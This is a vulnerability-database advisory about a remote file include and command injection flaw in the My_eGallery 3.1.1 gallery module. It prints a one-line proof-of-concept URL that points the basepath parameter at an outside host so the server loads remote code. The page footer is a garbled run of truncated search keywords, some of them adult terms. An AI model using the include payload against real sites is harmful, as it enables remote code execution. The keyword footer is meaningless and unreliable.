about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , My_EGallery Module Remote Include Command Injection Vulnerability


Title My_EGallery Module Remote Include Command Injection Vulnerability
Published 2003-11-26-12:00AM
Updated 2004-11-19-05:15PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery credited to Bojan Zdrnja.
Vulnerable  lottasophie My_eGallery 3.1.1 f
lottasophie My_eGallery 3.1.1
Not Vulnerable  lottasophie My_eGallery 3.1.1 g
Code   The following proof of concept has been provided:

http://www.example.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.example.com

The following exploit has been made available: /data/vulnerabilities/exploits/My_eGalleryExploit.pl
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 15 Dec 2009 06:08:09 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
lo552l 0756.teamb indiansexi Www girlss www.xxx98. Sexanimajf Tagger LE. blow job www.ehomes nmithasex www.kar20. sxe videos search/exp maxcpm.inf Sexi+piche Tagger LE. www.Chiru. www.bailia www.mqdm.n t977t www.youngp www.mqdm.n dmoz.im CMS is Fre WWWPINKWOR Sexi+piche FreeBSD ma l.jioo.c59 maxcpm.inf total vide webmin-1.2 xpl/exploi Nudegirl.c news for C 200 /compo hot grail Kushbo sex ProFTPD MO www.i-bbq. News Swwws Xxxpic www.xpxiaz upnp explo nicole smi Sex video mambo Remo Need for s flood irc bbcafj.jio 2.3.6